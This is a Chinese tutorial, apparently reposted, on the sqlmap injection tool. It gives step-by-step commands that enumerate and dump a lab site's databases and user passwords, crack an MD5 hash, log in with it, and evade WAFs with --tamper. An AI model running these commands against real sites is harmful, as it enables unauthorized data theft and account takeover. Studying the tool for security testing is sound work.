sqlmap基础教程

摘要:
Sqlmap是一个非常强大的开源自动sql注入工具,可用于检测和利用sql注入漏洞。Picindex=2注意:sqlmap仅用于检测和利用sql注入点,无法扫描出网站的漏洞。使用前请使用扫描工具扫描sql注入点。结果:结果显示sql server包含7个可用数据库。Id=134“--users VI数据库帐户和密码C:Python 27sqlmap˃pythonsqlmap.py-u”http://192.168.1.150/products.asp?

sqlmap是一款非常强大的开源sql自动化注入工具,可以用来检测和利用sql注入漏洞。它由Python语言开发而成,因此运行需要安装python环境。

python环境安装教程:http://jingyan.baidu.com/album/c910274be14d64cd361d2dd8.html?picindex=2

注意:sqlmap只是用来检测和利用sql注入点的,并不能扫描出网站有哪些漏洞,使用前请先使用扫描工具扫出sql注入点

先总结一下,使用sqlmap进行SQL爆库5步走:

判断                -u url1

爆库                -u url1  --dbs

爆表                -u url1  -D database1 --tables

爆字段                -u url1  -D database1 -T table1 --columns

爆字段信息           -u url1  -D database1 -T table1 -C "column1,column2..." --dump

一、检测注入点是否可用
  1. C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134"

参数:

-u:指定注入点url

-r:从指定路径的文本文件导入,如 -r "d:1.txt",txt文本内容通过burpsuite抓取,如下图所示:

sqlmap基础教程第1张

sqlmap扫描结果:

sqlmap基础教程第2张

 sqlmap基础教程第3张

注入结果展示:

(1)注入参数id为GET注入,注入类型有四种分别为:boolean-based blind、error-based、stacked queries、inline query。

(2)web服务器系统为windows 2003 or XP

(3)web应用程序技术为:ASP.NET, Microsoft IIS 6.0

(4)数据库类型为:SQLSERVER 2000

其中图一有若干询问语句,需要用户输入[Y/N],如果你懒得输入或者不懂怎么输入可以让程序自动输入,只需添加一个参数即可,命令如下:

  1. C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --batch
二、暴库

一条命令即可曝出该sqlserver中所有数据库名称,命令如下:

  1. C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --dbs


参数:

--dbms:探测web应用后端的数据库是什么

--dbs:dbs前面有两条杠,请看清楚。

结果:

sqlmap基础教程第4张

sqlmap基础教程第5张

结果显示该sqlserver中共包含7个可用的数据库。

三、web当前使用的数据库
  1. C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --current-db
    sqlmap基础教程第6张
    sqlmap基础教程第7张
四、web数据库使用账户
  1. C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --current-user

    sqlmap基础教程第8张
五、列出sqlserver所有用户
  1. C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --users
    sqlmap基础教程第9张
六、数据库账户与密码
  1. C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --passwords
    sqlmap基础教程第10张
     
七、列出数据库中的表
  1. C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata --tables

参数:

-D:指定数据库名称

--tables:列出表

结果:

sqlmap基础教程第11张

结果体现共列出了34张表。

八、列出表中字段
  1. C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb --columns


参数:

-D:指定数据库名称

-T:指定要列出字段的表

--columns:指定列出字段

结果:

sqlmap基础教程第12张

结果显示该userb表中包含了23条字段。

九、暴字段内容
  1. C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb -C "email,Username,userpassword" --dump

参数:

-C :指定要暴的字段

--dump:将结果导出

结果:

sqlmap基础教程第13张

 

如果字段内容太多,需要花费很多时间。可以指定导出特定范围的字段内容,命令如下:

C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb -C "email,Username,userpassword" --start 1 --stop 10 --dump

参数:

--start:指定开始的行

--stop:指定结束的行

此条命令的含义为:导出数据库tourdata中的表userb中的字段(email,Username,userpassword)中的第1到第10行的数据内容。

结果如下:

sqlmap基础教程第14张

十、验证结果

通过上图结果看到其中的一个用户信息为:

email:123456@qq.com

username: 1.asp

password: 49ba59abbe56e057

通过md5解密,得到该hash的原文密码为:123456

拿到账号密码我们来测试是否可以登录,登录结果如下:

sqlmap基础教程第15张

 

验证成功!


其他使用技巧

参数:-s

sqlmap对每一个目标都会在output路径下自动生成一个SQLite文件(默认路径 C:UsersAdministrator.sqlmapoutput),如果用户想指定读取的文件路径,就可以用这个参数。


参数:--tamper
sqlmap除了使用CHAR()函数来防止对注入数据(除单引号外)进行修改,还可以使用--tamper参数对数据做修改来绕过WAF等设备。

参数:-g

测试注入Google的搜索结果中的GET参数,如python sqlmap.py -g "inurl:".php?id=1""

选项中的大写字母为默认选择项

sqlmap基础教程第16张

免责声明:文章转载自《sqlmap基础教程》仅用于学习参考。如对内容有疑问,请及时联系本站处理。

上篇Linux 内核日志——dmesgperl 处理特殊字符下篇

宿迁高防,2C2G15M,22元/月;香港BGP,2C5G5M,25元/月 雨云优惠码:MjYwNzM=

相关文章

MySQL配置主主及主从备份

MySQL主从备份配置实例 场景: 1、主服务器192.168.0.225、从服务器192.168.0.226。其中,主服务器上已有数据。 2、主从服务器上的mysql版本及安装配置相同。 一、主从备份的原理: 主服务器数据库的每次操作都会记录在二进制日志文件mysql-bin.xxx中。从服务器的I/O线程使用专用帐号登陆到主服务器中读取该二进制文件,并...

ADO.NET(内涵效率问题)

ADO.NET 为什么要学习ADO.NET呢? 之前我们所学只能在查询分析器里查看数据,操作数据,我们不能让普通用户去学sql, 所以我们搭建一个界面(Web Winform)让用户方便的操作数据库中的数据 什么是ADO.NET? ADO.NET就是一组类库,这组类库可以让我们通过程序的方式访问数据库,就像System.IO下的类用类操作文件一样, Sys...

laravel查询数据库获取结果如何判断是否为空?

laravel 查询数据库获取结果如何判断是否为空? 大家使用的场景是这样的: 1 $users = DB::table('users')->where('id',$id)->get(); 2 3 if($users){ 4 //有数据 5 }else{ 6 //没数据 7 } 8 或 9 if(is_...

Navicat连接mysql数据库报错2003

用navigat连接数据库,不论怎样一直都无法连接mysql,一直报错2003 - Can’t connect to MySQL server on ‘47.112.13.231’ (60 “Operation timed out”) 然后上网各种搜,下面是网友提出的几个方面原因:1、/etc/mysql/mysql.conf.d/mysqld.cnf配置...

mybatis连接数据库

使用miproxy连接,存在过期连接的情况,经多次观察,属于研发配置错误,对于mybatis框架连接数据库需要同时启用 以下3个参数: testOnBorrow” value=”true” testOnReturn” value=”true” testWhileIdle” value=”true 一般连接池配置建议如下: <!-- 用...

Spring框架之jdbc源码完全解析

Spring框架之jdbc源码完全解析        Spring JDBC抽象框架所带来的价值将在以下几个方面得以体现:        1、指定数据库连接参数        2、打开数据库连接        3、声明SQL语句        4、预编译并执行SQL语句        5、遍历查询结果(如果需要的话)        6、处理每一次遍历操作...